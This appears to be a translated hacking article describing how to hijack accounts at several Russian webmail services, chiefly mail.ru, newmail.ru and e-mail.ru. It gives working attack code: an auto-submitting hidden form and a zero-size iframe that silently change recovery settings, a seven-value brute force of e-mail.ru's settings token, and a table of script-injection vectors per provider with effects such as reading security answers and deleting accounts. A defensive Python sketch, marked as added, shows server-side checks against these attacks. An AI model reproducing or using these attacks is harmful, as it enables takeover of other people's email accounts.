However, mail.ru mailbox settings can no longer be changed using the GET method, so I will describe the technical side of the issue in detail.
I. We send a letter to the desired mailbox containing code that generates a frame, directly in the body of the message, with a link to our website. If possible, the script should be triggered without any user involvement (clicking, hovering, image loading, etc.):
II. On the resource http://yoursite.ru we have an HTML document with the form for sending the modified data to the mail.ru server.
The content of yourscript.html:
<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="email@example.com">
<input type="hidden" value="Save" name="Save">
</form>
<script>
document.anketa.submit();
</script>

Notes: I can guarantee that the client-side part of the script works unchanged only in IE; the submission form is hosted on a separate site specifically to "offload" the letter.
We inject the script through the style tag.
Settings page address: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
Secret text field name: hint_a
WWW.NEWMAIL.RU
In my opinion, it is a fairly popular mailer, so I will talk about it in detail. Moreover, taking possession of someone else's account on it is much easier than it seems at first glance. You can do this: send an email with a script that obtains the session id when it runs, generates the necessary requests, and changes the alternative email setting (the address to which the password will then be sent) and the secret question and answer. However, if you specify any other address during the reminder, the password will be sent to it, provided the secret answer was correct. A further observation: the session id need NOT be used at all to change settings. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>
The method of hacking e-mail.ru does not quite fit the general subject of the article, but it is still mail. When I needed to get the password for one mailbox, I registered an account as usual and began to study the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer without entering the old password. The usual plan of action: check the tag filtering, get the ID and execute the request. However, changing the settings required a special variable called utoken, which is contained in the body of the document. Having experimented with changing the question and answer with a previously known utoken:
I came to the conclusion that the ID and cookies are not required to change the settings. At the same time, observation of utoken showed that the four-digit hexadecimal number after the email address firstname.lastname@example.org lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest, you need to try only 7 options: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. When the number is guessed, we get into the right mailbox.
Notes: some changes have since occurred. The password recovery service does not work, so it is advisable to change it right away. The address for changing settings has also changed:
The method does not always work. It probably still requires that the user occasionally logs in via the web.
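The weaknesses described above (settings changed by a GET request or an auto-submitted form, no session cookie required, a token taken from only 7 values, no old password asked) correspond to four server-side checks. The following sketch of those checks is an added example, not code from the article or from any of the mail services; the function names, request fields and sample data are assumptions constructed for illustration:

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: secret key held only by the server


def issue_csrf_token(session_id):
    """Token = 128-bit random nonce plus an HMAC that binds it to one session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def token_valid(session_id, token):
    """Recompute the HMAC for this session and compare in constant time."""
    nonce, _, mac_hex = token.partition(".")
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return hmac.compare_digest(expected.hexdigest().encode(), mac_hex.encode())


def check_settings_change(req, sessions):
    """Return the reasons to reject a secret question/answer change ([] = allow)."""
    reasons = []
    if req.get("method") != "POST":
        reasons.append("state change over non-POST method")
    sid = req.get("cookie_sid")
    session = sessions.get(sid)
    if session is None:
        return reasons + ["no authenticated session cookie"]
    if not token_valid(sid, req.get("csrf_token", "")):
        reasons.append("missing or invalid anti-CSRF token")
    if not session["verify_password"](req.get("current_password", "")):
        reasons.append("current password not confirmed")
    return reasons


# Constructed sample data: one logged-in user (the lambda stands in for a real
# password-hash check) and requests modelled on the cases the text describes.
SESSIONS = {"sid-123": {"verify_password":
                        lambda p: hmac.compare_digest(p.encode(), b"constructed-password")}}
GOOD = {"method": "POST", "cookie_sid": "sid-123",
        "csrf_token": issue_csrf_token("sid-123"),
        "current_password": "constructed-password"}
IFRAME_GET = {"method": "GET", "cookie_sid": "sid-123"}   # hidden frame, cookie sent by browser
AUTO_POST = {"method": "POST", "cookie_sid": "sid-123"}   # auto-submitted cross-site form
GUESSED = {"method": "POST", "csrf_token": "5a00"}        # no cookie, short guessable token

if __name__ == "__main__":
    for name in ("GOOD", "IFRAME_GET", "AUTO_POST", "GUESSED"):
        print(name, check_settings_change(globals()[name], SESSIONS))
```

Only the request that carries the session cookie, a token issued for that session and the current password passes; each of the other three is rejected with the reason that names the missing control.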
Table with the characteristics of free WWW-servers
| inbox.ru, bk.ru, list.ru, |
| email.com, post.com, myself.com, consultant.com, etc. |
| nm.ru, hotmail.ru, orc.ru, nightmail.ru | Any way | Read / change the question and answer. Password issued valid |
| www.netman.ru and www.mailgate.ru the same mailer. about 80 domains |
| www.yandex.ru | OnError, OnLoad | Removing the site *.narod.ru (JS is not required) |
| www.ukr.net | embed src = javasc ript: this .wav> | Read the answer to the security question. |
| xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru, pochta.ru, pisem.net, fromru.com, land.ru, etc. | In many ways | Account deleting |